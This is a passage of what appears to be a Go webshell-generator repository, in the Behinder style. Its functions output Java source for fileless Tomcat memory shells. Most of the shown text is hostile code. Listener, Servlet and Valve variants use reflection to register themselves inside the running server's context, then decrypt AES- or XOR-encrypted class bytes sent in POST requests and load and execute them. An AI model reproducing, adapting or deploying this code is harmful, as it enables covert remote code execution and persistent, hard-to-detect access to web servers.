| (Object[]) invokeMethod(context, "getApplicationEventListeners") 259 | ) { 260 | if (listener instanceof Proxy) { 261 | return; 262 | } 263 | } 264 | getMethodX(context.getClass(), "addApplicationEventListener", 1) 265 | .invoke(context, proxyObject); 266 | } 267 | 268 | public TomcatListener() { 269 | synchronized(lock) { 270 | Class servletRequestListener = null; 271 | try { 272 | servletRequestListener = Class.forName( 273 | "javax.servlet.ServletRequestListener" 274 | ); 275 | } catch (ClassNotFoundException e) { 276 | try { 277 | servletRequestListener = Class.forName( 278 | "jakarta.servlet.ServletRequestListener" 279 | ); 280 | } catch (ClassNotFoundException ex) {} 281 | } 282 | 283 | if (servletRequestListener != null) { 284 | Object proxyObject = Proxy.newProxyInstance( 285 | getLoader(), new Class[]{servletRequestListener}, this 286 | ); 287 | try { 288 | addListener(proxyObject); 289 | } catch (Exception e) {} 290 | } 291 | } 292 | } 293 | 294 | static { 295 | new TomcatListener(); 296 | } 297 | } 298 | ` 299 | } 300 | 301 | func TomactSer() { 302 | common.Filename = "TomcatServlet.java" 303 | common.Webshells = ` 304 | import java.lang.reflect.*; 305 | import java.util.*; 306 | 307 | public class TomcatServlet implements InvocationHandler { 308 | private static String pattern = "*.xml"; 309 | private static String password = "` + common.Password + `"; 310 | 311 | private static Object lock = new Object(); 312 | 313 | private Field getField(Object obj, String fieldName) { 314 | Class clazz; 315 | Field field = null; 316 | if (obj == null) { 317 | return null; 318 | } 319 | if (obj instanceof Class) { 320 | clazz = (Class) obj; 321 | } else { 322 | clazz = obj.getClass(); 323 | } 324 | while (clazz != null) { 325 | try { 326 | field = clazz.getDeclaredField(fieldName); 327 | clazz = null; 328 | } catch (NoSuchFieldException e) { 329 | clazz = clazz.getSuperclass(); 330 | } 331 | } 332 | if (field != null) { 333 | try { 334 | Field mf = Field.class.getDeclaredField("modifiers"); 335 | mf.setAccessible(true); 336 | mf.setInt(field, field.getModifiers() & ~Modifier.FINAL); 337 | field.setAccessible(true); 338 | } catch (Exception e) {} 339 | } 340 | return field; 341 | } 342 | 343 | private Object getFieldValue(Object obj, String fieldName) { 344 | Field field; 345 | if (obj instanceof Field) { 346 | field = (Field) obj; 347 | } else { 348 | field = getField(obj, fieldName); 349 | } 350 | try { 351 | return field.get(obj); 352 | } catch (IllegalAccessException e) { 353 | return null; 354 | } 355 | } 356 | 357 | private Method getMethodX(Class clazz, String methodName, int num) { 358 | Method[] methods = clazz.getDeclaredMethods(); 359 | for (Method method : methods) { 360 | if (method.getName().equals(methodName)) { 361 | if (method.getParameterTypes().length == num) { 362 | return method; 363 | } 364 | } 365 | } 366 | return null; 367 | } 368 | 369 | private Method getMethod(Class clazz, String methodName, Class... args) { 370 | Method method = null; 371 | while (clazz != null) { 372 | try { 373 | method = clazz.getDeclaredMethod(methodName, args); 374 | clazz = null; 375 | } catch (NoSuchMethodException e) { 376 | clazz = clazz.getSuperclass(); 377 | } 378 | } 379 | return method; 380 | } 381 | 382 | private Object invokeMethod( 383 | Object obj, String methodName, Object... args 384 | ) { 385 | ArrayList clazzs = new ArrayList(); 386 | if (args != null) { 387 | for (int i=0; i keySet = catalina.keySet().iterator(); 457 | while(keySet.hasNext()) { 458 | String key = keySet.next(); 459 | if (key.contains("NonLoginAuthenticator")) { 460 | nonLoginAuthenticator = catalina.get(key); 461 | break; 462 | } 463 | } 464 | Object object = getFieldValue(nonLoginAuthenticator, "object"); 465 | Object resource = getFieldValue(object, "resource"); 466 | return getFieldValue(resource, "context"); 467 | } 468 | 469 | 470 | private byte[] cipher( 471 | byte[] payload, String alg, byte[] key, boolean isEnc 472 | ) { 473 | try { 474 | javax.crypto.Cipher c = javax.crypto.Cipher.getInstance(alg); 475 | c.init(isEnc?1:2, new javax.crypto.spec.SecretKeySpec(key, alg)); 476 | return c.doFinal(payload); 477 | } catch (Exception e) { 478 | return null; 479 | } 480 | } 481 | 482 | private String hasher(String str, String alg) { 483 | try { 484 | java.security.MessageDigest h = 485 | java.security.MessageDigest.getInstance(alg); 486 | h.update(str.getBytes(), 0, str.length()); 487 | return new java.math.BigInteger(1, h.digest()).toString(16); 488 | } catch (Exception e) { 489 | return null; 490 | } 491 | } 492 | 493 | private byte[] decoder(String payload) { 494 | return cipher( 495 | b64decode(payload), "AES", 496 | hasher(password, "MD5").substring(0, 16).getBytes(), false 497 | ); 498 | } 499 | 500 | 501 | private String stub(String payload, Object request, Object response) 502 | throws Exception { 503 | if (invokeMethod(request, "getMethod").equals("POST")) { 504 | payload = (String) invokeMethod( 505 | invokeMethod(request, "getReader"),"readLine" 506 | ); 507 | java.util.HashMap pageContext = new java.util.HashMap(); 508 | Object session = invokeMethod(request, "getSession"); 509 | pageContext.put("request", request); 510 | pageContext.put("response", response); 511 | pageContext.put("session", session); 512 | invokeMethod(session, "putValue", 513 | 'u', hasher(password, "MD5").substring(0, 16)); 514 | byte[] b = decoder(payload); 515 | Constructor constructor = java.security.SecureClassLoader.class 516 | .getDeclaredConstructor(ClassLoader.class); 517 | constructor.setAccessible(true); 518 | ClassLoader classloader = (ClassLoader) constructor.newInstance( 519 | new Object[]{this.getClass().getClassLoader()} 520 | ); 521 | Method defineMethod = ClassLoader.class.getDeclaredMethod( 522 | "defineClass", byte[].class, int.class, int.class 523 | ); 524 | defineMethod.setAccessible(true); 525 | ((Class) defineMethod.invoke(classloader, b, 0, b.length)) 526 | .newInstance().equals(pageContext); 527 | } 528 | return null; 529 | } 530 | 531 | private void hook(Object servletRequest, Object servletResponse) 532 | throws Exception { 533 | String payload = (String) invokeMethod( 534 | servletRequest, "getParameter", password 535 | ); 536 | stub(payload, servletRequest, servletResponse); 537 | } 538 | 539 | @Override 540 | public Object invoke(Object proxy, Method method, Object[] args) 541 | throws Throwable { 542 | if (method.getName().equals("service")) { 543 | Object servletRequest = args[0]; 544 | Object servletResponse = args[1]; 545 | hook(servletRequest, servletResponse); 546 | } 547 | return null; 548 | } 549 | 550 | private void addSevlet(Object proxyObject) throws Exception { 551 | Object context = getStandardContext(); 552 | Object wrapper = invokeMethod(context, "createWrapper"); 553 | String name = this.getClass().getName(); 554 | invokeMethod(wrapper, "setServletName", name); 555 | invokeMethod(wrapper, "setLoadOnStartupString", "1"); 556 | getField(wrapper, "instance").set(wrapper, proxyObject); 557 | invokeMethod( 558 | wrapper, "setServletClass", proxyObject.getClass().getName() 559 | ); 560 | getMethodX(context.getClass(), "addChild", 1).invoke(context, wrapper); 561 | getMethodX(context.getClass(), "addServletMappingDecoded", 3) 562 | .invoke(context, pattern, name, false); 563 | } 564 | 565 | public TomcatServlet() { 566 | synchronized(lock) { 567 | Class servletClass = null; 568 | try { 569 | servletClass = Class.forName( 570 | "javax.servlet.Servlet" 571 | ); 572 | } catch (ClassNotFoundException e) { 573 | try { 574 | servletClass = Class.forName( 575 | "jakarta.servlet.Servlet" 576 | ); 577 | } catch (ClassNotFoundException ex) {} 578 | } 579 | 580 | if (servletClass != null) { 581 | Object proxyObject = Proxy.newProxyInstance( 582 | getLoader(), new Class[]{servletClass}, this 583 | ); 584 | try { 585 | addSevlet(proxyObject); 586 | } catch (Exception e) {} 587 | } 588 | } 589 | } 590 | 591 | static { 592 | new TomcatServlet(); 593 | } 594 | } 595 | ` 596 | } 597 | 598 | func TomactVa() { 599 | common.Filename = "TomcatValve.java" 600 | common.Webshells = ` 601 | import java.lang.reflect.*; 602 | import java.util.*; 603 | 604 | public class TomcatValve implements InvocationHandler { 605 | private static String password = "` + common.Password + `"; 606 | private static Object nextvalve = null; 607 | 608 | private static Object lock = new Object(); 609 | 610 | private Field getField(Object obj, String fieldName) { 611 | Class clazz; 612 | Field field = null; 613 | if (obj == null) { 614 | return null; 615 | } 616 | if (obj instanceof Class) { 617 | clazz = (Class) obj; 618 | } else { 619 | clazz = obj.getClass(); 620 | } 621 | while (clazz != null) { 622 | try { 623 | field = clazz.getDeclaredField(fieldName); 624 | clazz = null; 625 | } catch (NoSuchFieldException e) { 626 | clazz = clazz.getSuperclass(); 627 | } 628 | } 629 | if (field != null) { 630 | try { 631 | Field mf = Field.class.getDeclaredField("modifiers"); 632 | mf.setAccessible(true); 633 | mf.setInt(field, field.getModifiers() & ~Modifier.FINAL); 634 | field.setAccessible(true); 635 | } catch (Exception e) {} 636 | } 637 | return field; 638 | } 639 | 640 | private Object getFieldValue(Object obj, String fieldName) { 641 | Field field; 642 | if (obj instanceof Field) { 643 | field = (Field) obj; 644 | } else { 645 | field = getField(obj, fieldName); 646 | } 647 | try { 648 | return field.get(obj); 649 | } catch (IllegalAccessException e) { 650 | return null; 651 | } 652 | } 653 | 654 | private Method getMethodX(Class clazz, String methodName, int num) { 655 | Method[] methods = clazz.getDeclaredMethods(); 656 | for (Method method : methods) { 657 | if (method.getName().equals(methodName)) { 658 | if (method.getParameterTypes().length == num) { 659 | return method; 660 | } 661 | } 662 | } 663 | return null; 664 | } 665 | 666 | private Method getMethod(Class clazz, String methodName, Class... args) { 667 | Method method = null; 668 | while (clazz != null) { 669 | try { 670 | method = clazz.getDeclaredMethod(methodName, args); 671 | clazz = null; 672 | } catch (NoSuchMethodException e) { 673 | clazz = clazz.getSuperclass(); 674 | } 675 | } 676 | return method; 677 | } 678 | 679 | private Object invokeMethod( 680 | Object obj, String methodName, Object... args 681 | ) { 682 | ArrayList clazzs = new ArrayList(); 683 | if (args != null) { 684 | for (int i=0; i keySet = catalina.keySet().iterator(); 754 | while(keySet.hasNext()) { 755 | String key = keySet.next(); 756 | if (key.contains("NonLoginAuthenticator")) { 757 | nonLoginAuthenticator = catalina.get(key); 758 | break; 759 | } 760 | } 761 | Object object = getFieldValue(nonLoginAuthenticator, "object"); 762 | Object resource = getFieldValue(object, "resource"); 763 | return getFieldValue(resource, "context"); 764 | } 765 | 766 | 767 | private byte[] cipher( 768 | byte[] payload, String alg, byte[] key, boolean isEnc 769 | ) { 770 | try { 771 | javax.crypto.Cipher c = javax.crypto.Cipher.getInstance(alg); 772 | c.init(isEnc?1:2, new javax.crypto.spec.SecretKeySpec(key, alg)); 773 | return c.doFinal(payload); 774 | } catch (Exception e) { 775 | return null; 776 | } 777 | } 778 | 779 | private String hasher(String str, String alg) { 780 | try { 781 | java.security.MessageDigest h = 782 | java.security.MessageDigest.getInstance(alg); 783 | h.update(str.getBytes(), 0, str.length()); 784 | return new java.math.BigInteger(1, h.digest()).toString(16); 785 | } catch (Exception e) { 786 | return null; 787 | } 788 | } 789 | 790 | private byte[] decoder(String payload) { 791 | return cipher( 792 | b64decode(payload), "AES", 793 | hasher(password, "MD5").substring(0, 16).getBytes(), false 794 | ); 795 | } 796 | 797 | 798 | private String stub(String payload, Object request, Object response) 799 | throws Exception { 800 | if (invokeMethod(request, "getMethod").equals("POST")) { 801 | payload = (String) invokeMethod( 802 | invokeMethod(request, "getReader"),"readLine" 803 | ); 804 | java.util.HashMap pageContext = new java.util.HashMap(); 805 | Object session = invokeMethod(request, "getSession"); 806 | pageContext.put("request", request); 807 | pageContext.put("response", response); 808 | pageContext.put("session", session); 809 | invokeMethod(session, "putValue", 810 | 'u', hasher(password, "MD5").substring(0, 16)); 811 | byte[] b = decoder(payload); 812 | Constructor constructor = java.security.SecureClassLoader.class 813 | .getDeclaredConstructor(ClassLoader.class); 814 | constructor.setAccessible(true); 815 | ClassLoader classloader = (ClassLoader) constructor.newInstance( 816 | new Object[]{this.getClass().getClassLoader()} 817 | ); 818 | Method defineMethod = ClassLoader.class.getDeclaredMethod( 819 | "defineClass", byte[].class, int.class, int.class 820 | ); 821 | defineMethod.setAccessible(true); 822 | ((Class) defineMethod.invoke(classloader, b, 0, b.length)) 823 | .newInstance().equals(pageContext); 824 | } 825 | return null; 826 | } 827 | 828 | private void hook(Object request, Object response) throws Exception { 829 | String payload = (String) invokeMethod( 830 | request, "getParameter", password 831 | ); 832 | stub(payload, request, response); 833 | } 834 | 835 | @Override 836 | public Object invoke(Object proxy, Method method, Object[] args) 837 | throws Throwable { 838 | String methodName = method.getName(); 839 | if (methodName.equals("invoke")) { 840 | Object request = args[0]; 841 | Object response = args[1]; 842 | hook(request, response); 843 | Method invoke = getMethodX(nextvalve.getClass(), "invoke", 2); 844 | invoke.setAccessible(true); 845 | invoke.invoke(nextvalve, request, response); 846 | } else if (methodName.equals("setNext")) { 847 | nextvalve = args[0]; 848 | } else if (methodName.equals("getNext")) { 849 | return nextvalve; 850 | } else if (methodName.equals("toString")) { 851 | return this.getClass().getName(); 852 | } else if (methodName.equals("isAsyncSupported")) { 853 | return false; 854 | } 855 | return null; 856 | } 857 | 858 | private void addValve(Object proxyObject) throws Exception { 859 | Object context = getStandardContext(); 860 | Object pipeline = invokeMethod(context, "getPipeline"); 861 | getMethodX(pipeline.getClass(), "addValve", 1) 862 | .invoke(pipeline, proxyObject); 863 | } 864 | 865 | public TomcatValve() { 866 | synchronized(lock) { 867 | Class valveClass = null; 868 | try { 869 | valveClass = Class.forName( 870 | "org.apache.catalina.Valve" 871 | ); 872 | } catch (ClassNotFoundException e) {} 873 | 874 | if (valveClass != null) { 875 | Object proxyObject = Proxy.newProxyInstance( 876 | getLoader(), 877 | new Class[]{valveClass}, 878 | this 879 | ); 880 | try { 881 | addValve(proxyObject); 882 | } catch (Exception e) {} 883 | } 884 | } 885 | } 886 | 887 | static { 888 | new TomcatValve(); 889 | } 890 | } 891 | ` 892 | } 893 | -------------------------------------------------------------------------------- /shell/memory/Behinder/Betomcat/Bettxor.go: -------------------------------------------------------------------------------- 1 | package Betomcat 2 | 3 | import "webshell/common" 4 | 5 | func TomXorbL() { 6 | common.Filename = "TomcatListener.java" 7 | common.Webshells = `import java.lang.reflect.*; 8 | import java.util.*; 9 | 10 | public class TomcatListener implements InvocationHandler { 11 | private static String password = "` + common.Password + `"; 12 | 13 | private static Object lock = new Object(); 14 | 15 | private Field getField(Object obj, String fieldName) { 16 | Class clazz; 17 | Field field = null; 18 | if (obj == null) { 19 | return null; 20 | } 21 | if (obj instanceof Class) { 22 | clazz = (Class) obj; 23 | } else { 24 | clazz = obj.getClass(); 25 | } 26 | while (clazz != null) { 27 | try { 28 | field = clazz.getDeclaredField(fieldName); 29 | clazz = null; 30 | } catch (NoSuchFieldException e) { 31 | clazz = clazz.getSuperclass(); 32 | } 33 | } 34 | if (field != null) { 35 | try { 36 | Field mf = Field.class.getDeclaredField("modifiers"); 37 | mf.setAccessible(true); 38 | mf.setInt(field, field.getModifiers() & ~Modifier.FINAL); 39 | field.setAccessible(true); 40 | } catch (Exception e) {} 41 | } 42 | return field; 43 | } 44 | 45 | private Object getFieldValue(Object obj, String fieldName) { 46 | Field field; 47 | if (obj instanceof Field) { 48 | field = (Field) obj; 49 | } else { 50 | field = getField(obj, fieldName); 51 | } 52 | try { 53 | return field.get(obj); 54 | } catch (IllegalAccessException e) { 55 | return null; 56 | } 57 | } 58 | 59 | private Method getMethodX(Class clazz, String methodName, int num) { 60 | Method[] methods = clazz.getDeclaredMethods(); 61 | for (Method method : methods) { 62 | if (method.getName().equals(methodName)) { 63 | if (method.getParameterTypes().length == num) { 64 | return method; 65 | } 66 | } 67 | } 68 | return null; 69 | } 70 | 71 | private Method getMethod(Class clazz, String methodName, Class... args) { 72 | Method method = null; 73 | while (clazz != null) { 74 | try { 75 | method = clazz.getDeclaredMethod(methodName, args); 76 | clazz = null; 77 | } catch (NoSuchMethodException e) { 78 | clazz = clazz.getSuperclass(); 79 | } 80 | } 81 | return method; 82 | } 83 | 84 | private Object invokeMethod( 85 | Object obj, String methodName, Object... args 86 | ) { 87 | ArrayList clazzs = new ArrayList(); 88 | if (args != null) { 89 | for (int i=0; i keySet = catalina.keySet().iterator(); 159 | while(keySet.hasNext()) { 160 | String key = keySet.next(); 161 | if (key.contains("NonLoginAuthenticator")) { 162 | nonLoginAuthenticator = catalina.get(key); 163 | break; 164 | } 165 | } 166 | Object object = getFieldValue(nonLoginAuthenticator, "object"); 167 | Object resource = getFieldValue(object, "resource"); 168 | return getFieldValue(resource, "context"); 169 | } 170 | 171 | 172 | private byte[] cipher( 173 | byte[] payload, String alg, byte[] key, boolean isEnc 174 | ) { 175 | try { 176 | byte[] result = new byte[payload.length]; 177 | for (int i = 0; i < result.length; i++) { 178 | result[i] = (byte) (payload[i] ^ key[i + 1 & 15]); 179 | } 180 | return result; 181 | } catch (Exception e) { 182 | return null; 183 | } 184 | } 185 | 186 | private String hasher(String str, String alg) { 187 | try { 188 | java.security.MessageDigest h = 189 | java.security.MessageDigest.getInstance(alg); 190 | h.update(str.getBytes(), 0, str.length()); 191 | return new java.math.BigInteger(1, h.digest()).toString(16); 192 | } catch (Exception e) { 193 | return null; 194 | } 195 | } 196 | 197 | private byte[] decoder(String payload) { 198 | return cipher( 199 | b64decode(payload), "XOR", 200 | hasher(password, "MD5").substring(0, 16).getBytes(), false 201 | ); 202 | } 203 | 204 | 205 | private String stub(String payload, Object request, Object response) 206 | throws Exception { 207 | if (invokeMethod(request, "getMethod").equals("POST")) { 208 | payload = (String) invokeMethod( 209 | invokeMethod(request, "getReader"),"readLine" 210 | ); 211 | java.util.HashMap pageContext = new java.util.HashMap(); 212 | Object session = invokeMethod(request, "getSession"); 213 | pageContext.put("request", request); 214 | pageContext.put("response", response); 215 | pageContext.put("session", session); 216 | invokeMethod(session, "putValue", 217 | 'u', hasher(password, "MD5").substring(0, 16)); 218 | byte[] b = decoder(payload); 219 | Constructor constructor = java.security.SecureClassLoader.class 220 | .getDeclaredConstructor(ClassLoader.class); 221 | constructor.setAccessible(true); 222 | ClassLoader classloader = (ClassLoader) constructor.newInstance( 223 | new Object[]{this.getClass().getClassLoader()} 224 | ); 225 | Method defineMethod = ClassLoader.class.getDeclaredMethod( 226 | "defineClass", byte[].class, int.class, int.class 227 | ); 228 | defineMethod.setAccessible(true); 229 | ((Class) defineMethod.invoke(classloader, b, 0, b.length)) 230 | .newInstance().equals(pageContext); 231 | } 232 | return null; 233 | } 234 | 235 | private void hook(Object servletRequestEvent) throws Exception { 236 | Object servletRequest = invokeMethod( 237 | servletRequestEvent, "getServletRequest" 238 | ); 239 | Object request = getFieldValue(servletRequest, "request"); 240 | Object response = invokeMethod(request, "getResponse"); 241 | String payload = (String) invokeMethod( 242 | servletRequest, "getParameter", password 243 | ); 244 | stub(payload, request, response); 245 | } 246 | 247 | @Override 248 | public Object invoke(Object proxy, Method method, Object[] args) 249 | throws Throwable { 250 | if (method.getName().equals("requestInitialized")) { 251 | Object servletRequestEvent = args[0]; 252 | hook(servletRequestEvent); 253 | } 254 | return null; 255 | } 256 | 257 | private void addListener(Object proxyObject) throws Exception { 258 | Object context = getStandardContext(); 259 | for (Object listener : 260 | (Object[]) invokeMethod(context, "getApplicationEventListeners") 261 | ) { 262 | if (listener instanceof Proxy) { 263 | return; 264 | } 265 | } 266 | getMethodX(context.getClass(), "addApplicationEventListener", 1) 267 | .invoke(context, proxyObject); 268 | } 269 | 270 | public TomcatListener() { 271 | synchronized(lock) { 272 | Class servletRequestListener = null; 273 | try { 274 | servletRequestListener = Class.forName( 275 | "javax.servlet.ServletRequestListener" 276 | ); 277 | } catch (ClassNotFoundException e) { 278 | try { 279 | servletRequestListener = Class.forName( 280 | "jakarta.servlet.ServletRequestListener" 281 | ); 282 | } catch (ClassNotFoundException ex) {} 283 | } 284 | 285 | if (servletRequestListener != null) { 286 | Object proxyObject = Proxy.newProxyInstance( 287 | getLoader(), new Class[]{servletRequestListener}, this 288 | ); 289 | try { 290 | addListener(proxyObject); 291 | } catch (Exception e) {} 292 | } 293 | } 294 | } 295 | 296 | static { 297 | new TomcatListener(); 298 | } 299 | } 300 | ` 301 | } 302 | 303 | func TomcatXorSebe() { 304 | common.Filename = "TomcatServlet.java" 305 | common.Webshells = `import java.lang.reflect.*; 306 | import java.util.*; 307 | 308 | public class TomcatServlet implements InvocationHandler { 309 | private static String pattern = "*.xml"; 310 | private static String password = "` + common.Password + `"; 311 | 312 | private static Object lock = new Object(); 313 | 314 | private Field getField(Object obj, String fieldName) { 315 | Class clazz; 316 | Field field = null; 317 | if (obj == null) { 318 | return null; 319 | } 320 | if (obj instanceof Class) { 321 | clazz = (Class) obj; 322 | } else { 323 | clazz = obj.getClass(); 324 | } 325 | while (clazz != null) { 326 | try { 327 | field = clazz.getDeclaredField(fieldName); 328 | clazz = null; 329 | } catch (NoSuchFieldException e) { 330 | clazz = clazz.getSuperclass(); 331 | } 332 | } 333 | if (field != null) { 334 | try { 335 | Field mf = Field.class.getDeclaredField("modifiers"); 336 | mf.setAccessible(true); 337 | mf.setInt(field, field.getModifiers() & ~Modifier.FINAL); 338 | field.setAccessible(true); 339 | } catch (Exception e) {} 340 | } 341 | return field; 342 | } 343 | 344 | private Object getFieldValue(Object obj, String fieldName) { 345 | Field field; 346 | if (obj instanceof Field) { 347 | field = (Field) obj; 348 | } else { 349 | field = getField(obj, fieldName); 350 | } 351 | try { 352 | return field.get(obj); 353 | } catch (IllegalAccessException e) { 354 | return null; 355 | } 356 | } 357 | 358 | private Method getMethodX(Class clazz, String methodName, int num) { 359 | Method[] methods = clazz.getDeclaredMethods(); 360 | for (Method method : methods) { 361 | if (method.getName().equals(methodName)) { 362 | if (method.getParameterTypes().length == num) { 363 | return method; 364 | } 365 | } 366 | } 367 | return null; 368 | } 369 | 370 | private Method getMethod(Class clazz, String methodName, Class... args) { 371 | Method method = null; 372 | while (clazz != null) { 373 | try { 374 | method = clazz.getDeclaredMethod(methodName, args); 375 | clazz = null; 376 | } catch (NoSuchMethodException e) { 377 | clazz = clazz.getSuperclass(); 378 | } 379 | } 380 | return method; 381 | } 382 | 383 | private Object invokeMethod( 384 | Object obj, String methodName, Object... args 385 | ) { 386 | ArrayList clazzs = new ArrayList(); 387 | if (args != null) { 388 | for (int i=0; i keySet = catalina.keySet().iterator(); 458 | while(keySet.hasNext()) { 459 | String key = keySet.next(); 460 | if (key.contains("NonLoginAuthenticator")) { 461 | nonLoginAuthenticator = catalina.get(key); 462 | break; 463 | } 464 | } 465 | Object object = getFieldValue(nonLoginAuthenticator, "object"); 466 | Object resource = getFieldValue(object, "resource"); 467 | return getFieldValue(resource, "context"); 468 | } 469 | 470 | 471 | private byte[] cipher( 472 | byte[] payload, String alg, byte[] key, boolean isEnc 473 | ) { 474 | try { 475 | byte[] result = new byte[payload.length]; 476 | for (int i = 0; i < result.length; i++) { 477 | result[i] = (byte) (payload[i] ^ key[i + 1 & 15]); 478 | } 479 | return result; 480 | } catch (Exception e) { 481 | return null; 482 | } 483 | } 484 | 485 | private String hasher(String str, String alg) { 486 | try { 487 | java.security.MessageDigest h = 488 | java.security.MessageDigest.getInstance(alg); 489 | h.update(str.getBytes(), 0, str.length()); 490 | return new java.math.BigInteger(1, h.digest()).toString(16); 491 | } catch (Exception e) { 492 | return null; 493 | } 494 | } 495 | 496 | private byte[] decoder(String payload) { 497 | return cipher( 498 | b64decode(payload), "XOR", 499 | hasher(password, "MD5").substring(0, 16).getBytes(), false 500 | ); 501 | } 502 | 503 | 504 | private String stub(String payload, Object request, Object response) 505 | throws Exception { 506 | if (invokeMethod(request, "getMethod").equals("POST")) { 507 | payload = (String) invokeMethod( 508 | invokeMethod(request, "getReader"),"readLine" 509 | ); 510 | java.util.HashMap pageContext = new java.util.HashMap(); 511 | Object session = invokeMethod(request, "getSession"); 512 | pageContext.put("request", request); 513 | pageContext.put("response", response); 514 | pageContext.put("session", session); 515 | invokeMethod(session, "putValue", 516 | 'u', hasher(password, "MD5").substring(0, 16)); 517 | byte[] b = decoder(payload); 518 | Constructor constructor = java.security.SecureClassLoader.class 519 | .getDeclaredConstructor(ClassLoader.class); 520 | constructor.setAccessible(true); 521 | ClassLoader classloader = (ClassLoader) constructor.newInstance( 522 | new Object[]{this.getClass().getClassLoader()} 523 | ); 524 | Method defineMethod = ClassLoader.class.getDeclaredMethod( 525 | "defineClass", byte[].class, int.class, int.class 526 | ); 527 | defineMethod.setAccessible(true); 528 | ((Class) defineMethod.invoke(classloader, b, 0, b.length)) 529 | .newInstance().equals(pageContext); 530 | } 531 | return null; 532 | } 533 | 534 | private void hook(Object servletRequest, Object servletResponse) 535 | throws Exception { 536 | String payload = (String) invokeMethod( 537 | servletRequest, "getParameter", password 538 | ); 539 | stub(payload, servletRequest, servletResponse); 540 | } 541 | 542 | @Override 543 | public Object invoke(Object proxy, Method method, Object[] args) 544 | throws Throwable { 545 | if (method.getName().equals("service")) { 546 | Object servletRequest = args[0]; 547 | Object servletResponse = args[1]; 548 | hook(servletRequest, servletResponse); 549 | } 550 | return null; 551 | } 552 | 553 | private void addSevlet(Object proxyObject) throws Exception { 554 | Object context = getStandardContext(); 555 | Object wrapper = invokeMethod(context, "createWrapper"); 556 | String name = this.getClass().getName(); 557 | invokeMethod(wrapper, "setServletName", name); 558 | invokeMethod(wrapper, "setLoadOnStartupString", "1"); 559 | getField(wrapper, "instance").set(wrapper, proxyObject); 560 | invokeMethod( 561 | wrapper, "setServletClass", proxyObject.getClass().getName() 562 | ); 563 | getMethodX(context.getClass(), "addChild", 1).invoke(context, wrapper); 564 | getMethodX(context.getClass(), "addServletMappingDecoded", 3) 565 | .invoke(context, pattern, name, false); 566 | } 567 | 568 | public TomcatServlet() { 569 | synchronized(lock) { 570 | Class servletClass = null; 571 | try { 572 | servletClass = Class.forName( 573 | "javax.servlet.Servlet" 574 | ); 575 | } catch (ClassNotFoundException e) { 576 | try { 577 | servletClass = Class.forName( 578 | "jakarta.servlet.Servlet" 579 | ); 580 | } catch (ClassNotFoundException ex) {} 581 | } 582 | 583 | if (servletClass != null) { 584 | Object proxyObject = Proxy.newProxyInstance( 585 | getLoader(), new Class[]{servletClass}, this 586 | ); 587 | try { 588 | addSevlet(proxyObject); 589 | } catch (Exception e) {} 590 | } 591 | } 592 | } 593 | 594 | static { 595 | new TomcatServlet(); 596 | } 597 | } 598 | ` 599 | } 600 | 601 | func TomcatXorVabe() { 602 | common.Filename = "TomcatValve.java" 603 | common.Webshells = ` 604 | import java.lang.reflect.*; 605 | import java.util.*; 606 | 607 | public class TomcatValve implements InvocationHandler { 608 | private static String password = "` + common.Password + `"; 609 | private static Object nextvalve = null; 610 | 611 | private static Object lock = new Object(); 612 | 613 | private Field getField(Object obj, String fieldName) { 614 | Class clazz; 615 | Field field = null; 616 | if (obj == null) { 617 | return null; 618 | } 619 | if (obj instanceof Class) { 620 | clazz = (Class) obj; 621 | } else { 622 | clazz = obj.getClass(); 623 | } 624 | while (clazz != null) { 625 | try { 626 | field = clazz.getDeclaredField(fieldName); 627 | clazz = null; 628 | } catch (NoSuchFieldException e) { 629 | clazz = clazz.getSuperclass(); 630 | } 631 | } 632 | if (field != null) { 633 | try { 634 | Field mf = Field.class.getDeclaredField("modifiers"); 635 | mf.setAccessible(true); 636 | mf.setInt(field, field.getModifiers() & ~Modifier.FINAL); 637 | field.setAccessible(true); 638 | } catch (Exception e) {} 639 | } 640 | return field; 641 | } 642 | 643 | private Object getFieldValue(Object obj, String fieldName) { 644 | Field field; 645 | if (obj instanceof Field) { 646 | field = (Field) obj; 647 | } else { 648 | field = getField(obj, fieldName); 649 | } 650 | try { 651 | return field.get(obj); 652 | } catch (IllegalAccessException e) { 653 | return null; 654 | } 655 | } 656 | 657 | private Method getMethodX(Class clazz, String methodName, int num) { 658 | Method[] methods = clazz.getDeclaredMethods(); 659 | for (Method method : methods) { 660 | if (method.getName().equals(methodName)) { 661 | if (method.getParameterTypes().length == num) { 662 | return method; 663 | } 664 | } 665 | } 666 | return null; 667 | } 668 | 669 | private Method getMethod(Class clazz, String methodName, Class... args) { 670 | Method method = null; 671 | while (clazz != null) { 672 | try { 673 | method = clazz.getDeclaredMethod(methodName, args); 674 | clazz = null; 675 | } catch (NoSuchMethodException e) { 676 | clazz = clazz.getSuperclass(); 677 | } 678 | } 679 | return method; 680 | } 681 | 682 | private Object invokeMethod( 683 | Object obj, String methodName, Object... args 684 | ) { 685 | ArrayList clazzs = new ArrayList(); 686 | if (args != null) { 687 | for (int i=0; i keySet = catalina.keySet().iterator(); 757 | while(keySet.hasNext()) { 758 | String key = keySet.next(); 759 | if (key.contains("NonLoginAuthenticator")) { 760 | nonLoginAuthenticator = catalina.get(key); 761 | break; 762 | } 763 | } 764 | Object object = getFieldValue(nonLoginAuthenticator, "object"); 765 | Object resource = getFieldValue(object, "resource"); 766 | return getFieldValue(resource, "context"); 767 | } 768 | 769 | 770 | private byte[] cipher( 771 | byte[] payload, String alg, byte[] key, boolean isEnc 772 | ) { 773 | try { 774 | byte[] result = new byte[payload.length]; 775 | for (int i = 0; i < result.length; i++) { 776 | result[i] = (byte) (payload[i] ^ key[i + 1 & 15]); 777 | } 778 | return result; 779 | } catch (Exception e) { 780 | return null; 781 | } 782 | } 783 | 784 | private String hasher(String str, String alg) { 785 | try { 786 | java.security.MessageDigest h = 787 | java.security.MessageDigest.getInstance(alg); 788 | h.update(str.getBytes(), 0, str.length()); 789 | return new java.math.BigInteger(1, h.digest()).toString(16); 790 | } catch (Exception e) { 791 | return null; 792 | } 793 | } 794 | 795 | private byte[] decoder(String payload) { 796 | return cipher( 797 | b64decode(payload), "XOR", 798 | hasher(password, "MD5").substring(0, 16).getBytes(), false 799 | ); 800 | } 801 | 802 | 803 | private String stub(String payload, Object request, Object response) 804 | throws Exception { 805 | if (invokeMethod(request, "getMethod").equals("POST")) { 806 | payload = (String) invokeMethod( 807 | invokeMethod(request, "getReader"),"readLine" 808 | ); 809 | java.util.HashMap pageContext = new java.util.HashMap(); 810 | Object session = invokeMethod(request, "getSession"); 811 | pageContext.put("request", request); 812 | pageContext.put("response", response); 813 | pageContext.put("session", session); 814 | invokeMethod(session, "putValue", 815 | 'u', hasher(password, "MD5").substring(0, 16)); 816 | byte[] b = decoder(payload); 817 | Constructor constructor 